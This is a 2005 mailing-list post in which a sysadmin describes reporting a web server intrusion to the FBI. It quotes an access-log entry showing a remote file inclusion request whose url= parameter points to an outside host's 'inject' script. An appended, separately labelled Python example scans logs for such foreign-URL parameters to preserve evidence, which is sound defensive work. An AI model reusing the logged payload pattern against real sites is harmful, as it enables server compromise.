[lug] SUM: Reporting an Intrusion

Bill Thoen bthoen at gisnet.com
Tue Sep 13 12:50:48 MDT 2005


Thanks for the advice, everyone, but it looks like you're right. A hack on 
my little machine is not a big deal in terms of national security, but 
here's what the FBI said.

First, the difficulties are that the originating IP appears to be outside
the United States, and also that the limit of actual damages in this case
(time spent in repairing the system) was probably not more than $100.  
Though the FBI agent didn't say so, the message was clearly "don't hold
your breath."

Here's a little sample from the logs if anyone's curious about where this
event came from:

219.83.0.61 - - [12/Sep/2005:10:42:31 -0600] "POST /catalog/software/index.php?url=http://mali.sslcatacombnetworking.com/~efi/inject/tclx HTTP/1.1" 200 9461 "http://www.gisnet.com/catalog/software/index.php?url=http://mali.sslcatacombnetworking.com/~efi/inject/tclx" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"

Anyway, they took down my information and told me to preserve the log
information that shows evidence of the intrusion in case anyone wants to
see it later, and also to report it on the www.ic3.gov (Internet Crime
Complaint Center) website. Apparently that's one place where hacking 
information does get centralized, and maybe they'll see a wider pattern 
one day and send a double-O agent to Jakarta to liquidate someone...

So I guess just like trying to fight spam by reporting it, reporting
hacker activity is just about as satisfying. I have a feeling that my
report is going to be filed in that govt. warehouse where they stuffed the
ark in the Indiana Jones movie. 

- Bill Thoen
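
Added example, not part of the original post: one way to pull entries like the one quoted above out of an Apache combined-format access log so they can be preserved, by flagging requests whose query string carries an absolute URL on a host other than the site's own. The OWN_HOSTS set, the function names and sample lines 2-4 are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
# Assumption: hostnames that legitimately belong to the site being checked.
OWN_HOSTS = {"www.gisnet.com", "gisnet.com"}

# Line 1 is the entry quoted in the post; lines 2-4 are constructed for illustration.
SAMPLE = [
    '219.83.0.61 - - [12/Sep/2005:10:42:31 -0600] "POST /catalog/software/index.php?url=http://mali.sslcatacombnetworking.com/~efi/inject/tclx HTTP/1.1" 200 9461 "http://www.gisnet.com/catalog/software/index.php?url=http://mali.sslcatacombnetworking.com/~efi/inject/tclx" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"',
    '192.0.2.10 - - [12/Sep/2005:10:43:02 -0600] "GET /catalog/software/index.php?url=products.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [12/Sep/2005:10:44:15 -0600] "GET /catalog/software/index.php?url=http%3A%2F%2Fwww.gisnet.com%2Fnews.php HTTP/1.1" 200 4200 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Sep/2005:10:45:40 -0600] "GET /catalog/software/index.php?page=2&url=HTTP%3A%2F%2Fexample.net%2Fx HTTP/1.1" 404 312 "-" "-"',
]

def external_url_params(target, own_hosts=OWN_HOSTS):
    """Return (name, value) pairs whose decoded value is an absolute URL on a foreign host."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        try:
            parts = urlsplit(value.strip())  # scheme and hostname come back lower-cased
        except ValueError:
            continue  # malformed value (e.g. broken IPv6 literal); not a usable URL
        if parts.scheme in ("http", "https", "ftp") and parts.hostname:
            if parts.hostname not in own_hosts:
                hits.append((name, value))
    return hits

def scan(lines):
    """Yield one evidence record per log line that carries an external URL parameter."""
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not a combined-format line
        hits = external_url_params(m["target"])
        if hits:
            yield {"line": lineno, "ip": m["ip"], "time": m["time"],
                   "status": int(m["status"]), "params": hits}

if __name__ == "__main__":
    for rec in scan(SAMPLE):
        print(rec)
```

The status field is kept in each record because a 200 response, as in the quoted entry, is worth separating from requests the server rejected.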




